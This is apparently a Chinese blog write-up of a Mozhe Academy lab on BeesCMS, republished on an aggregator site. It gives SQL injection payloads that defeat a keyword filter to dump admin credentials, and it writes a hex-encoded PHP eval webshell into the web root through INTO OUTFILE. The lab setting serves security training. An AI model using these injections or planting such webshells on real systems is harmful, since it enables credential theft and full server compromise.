BeesCMS系统漏洞分析

这篇具有很好参考价值的文章主要介绍了BeesCMS系统漏洞分析。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

墨者学院
beescms漏洞,cms题,安全,web安全,数据库
漏洞复现
进入首页,看到没什么问题,用kail字典birb扫下路径(发现管理页面)
beescms漏洞,cms题,安全,web安全,数据库
看到输入框,尝试sql注入,发现有注入漏洞
beescms漏洞,cms题,安全,web安全,数据库
既然存在报错信息,我们就尝试报错注入,经过尝试and也被过滤了,and用an and d代替,union用un union ion代替,select用selselectect代替:

报错注入

admin' an and d extractvalue(1,concat(0x7e,(select database()),0x7e))#

爆出数据库名为dees
beescms漏洞,cms题,安全,web安全,数据库

爆表名:
发现from、where、=也被过滤了,等号用like代替

admin’ an and d extractvalue(1,concat(0x7e,(selselectect table_name fro from m information_schema.tables wh where ere table_schema like ‘dees’ limit 0,1),0x7e))#

beescms漏洞,cms题,安全,web安全,数据库

爆字段

admin' an and d extractvalue(1,concat(0x7e,(selselectect column_name fro from m information_schema.columns wh where ere table_name like 'bees_admin' limit 1,1),0x7e))#

beescms漏洞,cms题,安全,web安全,数据库
修改为limit 2,1
beescms漏洞,cms题,安全,web安全,数据库

爆值

admin’ an and d extractvalue(1,concat(0x7e,(selselectect admin_name fro from m bees_admin limit 0,1),0x7e))#

beescms漏洞,cms题,安全,web安全,数据库

admin’ an and d extractvalue(1,concat(0x7e,(selselectect admin_password fro from m bees_admin limit 0,1),0x7e))#

beescms漏洞,cms题,安全,web安全,数据库
md5解密出来admin。

进入后发现没有什么可以动的东西,想起提示网站位于"/var/www/html/"目录下。

上传木马

那么都不用拿到账号密码了。。。。

user=admin' un union ion selselectect 1,2,3,4,5 i into nto outoutfilefile '/var/www/html/shell.php&password=1&code=abd5&submit=true&submit.x=60&submit.y=23

beescms漏洞,cms题,安全,web安全,数据库
测试文件上传可

下面直接写入一句话木马:

user=admin' un union ion selselectect 1,<?php @eval($_REQUEST['ABC']);?>,3,4,5 i into nto outoutfilefile '/var/www/html/1.php'&password=12&code=f333&submit=true&submit.x=49&submit.y=30

发现并没有<>被过滤了
beescms漏洞,cms题,安全,web安全,数据库
转成16进制

user=admin' un union ion selselectect 1,0x3c3f70687020406576616c28245f524551554553545b27414243275d293b3f3e,3,4,5 i into nto outoutfilefile
'/var/www/html/123.php'#&password=12&code=f333&submit=true&submit.x=49&submit.y=30

连接成功
beescms漏洞,cms题,安全,web安全,数据库文章来源地址https://www.toymoban.com/news/detail-613873.html

到了这里,关于BeesCMS系统漏洞分析的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 墨者——内部文件上传系统漏洞分析溯源 内部文件上传系统漏洞分析溯源

    1.选择合适的文件上传 2.可以看到为 *.asp 文件 3.可以推测出此站点为 IIS 4.上传 shell.asp 试试 5.上传报错,将其改名为 shell.asp.txt 上传,发现上传成功 6.有个问题就是服务器将我们所上传的文件进行了重命名,故我们应该想办法截断 7.经过测试发现不行,那么查看一下操作系统

    2024年02月06日
    浏览(34)
  • 本地提权漏洞分析【网络安全】

    CVE-2023-21752 是 2023 年开年微软第一个有 exploit 的漏洞,原本以为有利用代码会很好分析,但是结果花费了很长时间,难点主要了两个:漏洞点定位和漏洞利用代码分析,欢迎指正。 根据官方信息,该漏洞是 Windows Backup Service 中的权限提升漏洞,经过身份认证的攻击者可利用此

    2024年02月04日
    浏览(40)
  • 【网络安全】CVE漏洞分析以及复现

    漏洞详情 Shiro 在路径控制的时候,未能对传入的 url 编码进行 decode 解码,导致攻击者可以绕过过滤器,访问被过滤的路径。 漏洞影响版本 Shiro 1.0.0-incubating 对应 Maven Repo 里面也有 【一一帮助安全学习,所有资源获取一一】 ①网络安全学习路线 ②20份渗透测试电子书 ③安全

    2024年02月06日
    浏览(34)
  • 【网络安全】本地提权漏洞分析

    CVE-2023-21752 是 2023 年开年微软第一个有 exploit 的漏洞,原本以为有利用代码会很好分析,但是结果花费了很长时间,难点主要了两个:漏洞点定位和漏洞利用代码分析,欢迎指正。 根据官方信息,该漏洞是 Windows Backup Service 中的权限提升漏洞,经过身份认证的攻击者可利用此

    2024年02月01日
    浏览(76)
  • Tcsec安全研究院|fastjson漏洞分析

    fastjson 是一个 Java 库,可用于将 Java 对象转换为其 JSON 表示形式。它还可以用于将 JSON 字符串转换为等效的 Java 对象。Fastjson 可以处理任意的 Java 对象,包括没有源代码的预先存在的对象。 java 的核心就是对象的操作,fastjson 同样遵循这个原则利用get、set操作对象。将 User 对

    2024年02月13日
    浏览(33)
  • Java安全之SnakeYaml漏洞分析与利用

    SnakeYaml是Java中解析yaml的库,而yaml是一种人类可读的数据序列化语言,通常用于编写配置文件等。 yaml基本语法 : 大小写敏感 使用缩进表示层级关系 缩进只允许使用空格 # 表示注释 支持对象、数组、纯量这3种数据结构 示例 yaml对象: yaml数组: 意思是 companies 属性是一个数

    2024年02月04日
    浏览(28)
  • 某C2鸡肋漏洞分析:你的CS安全吗?

    CobaltStrike是一个知名的红队命令与控制框架,采用 Beacon - TeamServer - Client 架构。TeamServer存在受限路径穿越写文件与反序列化漏洞,可以被认证后客户端恶意利用。Client存在反序列化漏洞,可以被RogueCS攻击。 由于这个软件的特殊性,我们需要想想什么才是漏洞: 直接攻击Te

    2024年01月20日
    浏览(32)
  • 网络安全之反序列化漏洞分析

    FastJson 是 alibaba 的一款开源 JSON 解析库,可用于将 Java 对象转换为其 JSON 表示形式,也可以用于将 JSON 字符串转换为等效的 Java 对象分别通过 toJSONString 和 parseObject/parse 来实现序列化和反序列化。 使用 对于序列化的方法 toJSONString() 有多个重载形式。 SerializeFeature : 通过设置

    2024年02月08日
    浏览(30)
  • [JAVA安全]CVE-2022-33980命令执行漏洞分析

    在 i春秋的漏洞靶标上看见了此漏洞,所以前来分析一下漏洞原理,比较也是去年 7月的漏洞。 漏洞描述:Apache官方发布安全公告,修复了一个存在于Apache Commons Configuration 组件的远程代码执行漏洞,漏洞编号:CVE-2022-33980,漏洞威胁等级:高危。恶意攻击者通过该漏洞,可在

    2024年02月15日
    浏览(30)
  • MS14-068 漏洞分析—不安全的PAC

    这是一个危害较高的漏洞:只需要一个域内的普通用户的账户密码,便可拿到域控的权限 建议看本文章前,先把之前写的 NTLM与kerberos认证体系详解 这篇文章看完。 利用伪造的高权限的PAC来获取一个带有高权限PAC的TGT。 (关于pac是什么可以看完上面的那个文章) 在我们的AS_R

    2023年04月25日
    浏览(24)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包